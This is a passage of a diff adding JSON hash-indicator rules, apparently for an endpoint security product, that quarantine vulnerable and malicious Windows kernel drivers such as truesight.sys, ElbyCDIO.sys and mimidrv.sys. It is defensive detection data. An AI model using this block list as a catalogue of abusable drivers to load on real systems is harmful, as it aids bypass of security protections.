+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afb2121e-e12e-5702-ab1d-a9e9cfeba8c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481221Z",
+ "creation_date": "2026-03-23T11:45:30.481223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2decc56788d257ce7f6b1915c90ea5a54fb5232f2bf9f311958de495a4eb308",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afbba428-730f-543a-99d9-6da7af2060ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983508Z",
+ "creation_date": "2026-03-23T11:45:29.983510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b583414fcee280128788f7b39451c511376fe821f455d4f3702795e96d560704",
+ "comment": "Vulnerable Kernel Driver (aka KfeCo10X64.sys) [https://www.loldrivers.io/drivers/3e0bf6dc-791b-4170-8c40-427e7299d93d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afbc4def-affe-5dce-a46f-c422ef56df2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979550Z",
+ "creation_date": "2026-03-23T11:45:29.979552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afbfb572-15f3-5e1b-a2a7-b52448414d5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830464Z",
+ "creation_date": "2026-03-23T11:45:31.830466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830471Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bf3fa1666670063f79fff789c55dcff9c6038f642b92f9fbc7ba53ba7460e21",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afd1dc69-25f3-53ee-8ea4-fb89a1f5d027",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972950Z",
+ "creation_date": "2026-03-23T11:45:29.972954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cfad3d473961763306d72c12bd5ae14183a1a5778325c9acacca764b79ca185",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afe33387-da13-5e84-9138-ea7fe3012183",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619609Z",
+ "creation_date": "2026-03-23T11:45:29.619614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e53b58415fa68552928622118d5b8a3a851b2fc512709a90b63ba46acda8b6b",
+ "comment": "Vulnerable Kernel Driver (aka SysDrv3S.sys) [https://www.loldrivers.io/drivers/cf49f43c-d7b4-4c1a-a40d-1be36ea64bff/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "affbc424-49e7-558f-a44d-4257dd516943",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825989Z",
+ "creation_date": "2026-03-23T11:45:31.825992Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6661ef3ce558cbdf27a01a4a4a6084fc2401cf4c13ba8615ec4690538b332f09",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b003ff71-c6fd-507d-a73f-5f206ad1ee3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156397Z",
+ "creation_date": "2026-03-23T11:45:31.156399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f8c7f9b8f55ac4236e25f9bdf962f507c3cf2e7f2d57782e9c9a0ac88a60da3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b004ef32-a9f2-59b6-a0c7-5e340b6a1588",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480192Z",
+ "creation_date": "2026-03-23T11:45:30.480194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51145a3fa8258aac106f65f34159d23c54b48b6d54ec0421748b3939ab6778eb",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b005447e-f821-5d64-89ef-549eba2844f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981349Z",
+ "creation_date": "2026-03-23T11:45:29.981351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eba14a2b4cefd74edaf38d963775352dc3618977e30261aab52be682a76b536f",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0278ac7-09f4-5351-8bc0-d7477acca052",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836397Z",
+ "creation_date": "2026-03-23T11:45:30.836399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6af8011def8267140004e3d2f779544862127d3840aaf570026ee5c5418e62d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b03e29a1-dcbb-51c2-a01f-057ae6db0957",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825220Z",
+ "creation_date": "2026-03-23T11:45:31.825224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f307933a0d6a66dbf391be25208cdb286720ba443887f6d3d7abf3bbc494ebe1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0416042-feaa-570d-9c09-c7629be61d3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473815Z",
+ "creation_date": "2026-03-23T11:45:30.473818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f8cabb101d8ee0d76444fa4caa115b88b53ad8bd95516cae563bf92b910fa99",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b04aa3dd-d6e3-5388-8dc2-7572b5114c33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160794Z",
+ "creation_date": "2026-03-23T11:45:31.160797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b09543f14f144b11c4628de5a69aef95d4fa2682759498bb7b267fde8edefb8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b04c601b-6a4b-5178-9a28-8ecde24948a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978207Z",
+ "creation_date": "2026-03-23T11:45:29.978210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "640eeb3128ae5c353034ee29cb656d38c41353743396c1c936afd4d04a782087",
+ "comment": "Vulnerable Kernel Driver (aka t7.sys) [https://www.loldrivers.io/drivers/7196366e-04f0-4aaf-9184-ed0a0d21a75f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0536d73-9dbf-558b-a122-7766f4723d25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818736Z",
+ "creation_date": "2026-03-23T11:45:30.818738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818744Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe9c104a3bb9184a8f792f3f8a3e90d83b9f19cf83cd93d116b02e17f54d727d",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b058cd85-82dd-5835-8c8c-472b01fcb7a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477035Z",
+ "creation_date": "2026-03-23T11:45:31.477039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b1283f50cc1b7853ca7fdee3cd3c8b3d011ce3aabb4d6e83ec9217cfdbc322d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b069b788-316d-5ef6-b7b1-4a43387769be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151414Z",
+ "creation_date": "2026-03-23T11:45:31.151417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b96332b61a4792bc73266b1e9f21fbef0bd0797a9fba283397285f5230028318",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b06dddd3-9b6d-5f0b-9ce6-0fe8c2ecb925",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468406Z",
+ "creation_date": "2026-03-23T11:45:30.468409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e1c7bdb1fa71145a0704a5f00d894043a7754cb82d1d8213cb6a899bd767cab",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b06fbcd9-6018-542a-87ce-52e97c712370",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817347Z",
+ "creation_date": "2026-03-23T11:45:30.817349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42f468244050bafdcfc061c0eb468fd78267f93404b8703353d68fdca8b4355e",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0895aeb-4d37-5818-9b8f-ca4f6ccf4c52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486858Z",
+ "creation_date": "2026-03-23T11:45:31.486861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0ef83ed123736df20c481c60a146b1cd2d77aa208b3fd7afa97e473fd818307",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0bac34d-09a7-5b2d-ba66-17b7e555e11d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968350Z",
+ "creation_date": "2026-03-23T11:45:29.968351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b45d78a6780f125143dbd198ac2439be78424e7ae37a4234541ecb327dc190c1",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b0bdafa1-f131-56b9-bfca-c7335ce4845d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
